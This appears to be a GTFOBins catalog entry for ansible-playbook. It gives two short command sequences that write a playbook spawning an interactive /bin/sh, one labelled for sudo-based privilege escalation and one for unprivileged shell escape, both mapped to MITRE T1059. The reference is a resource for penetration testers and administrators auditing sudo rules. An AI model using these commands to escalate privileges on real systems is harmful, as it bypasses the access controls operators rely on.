Catalog GTFOBins

GTFO · Tool

ansible-playbook

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file
ansible-playbook /path/to/temp-file
Context
unprivileged
Native
shell
MITRE
T1059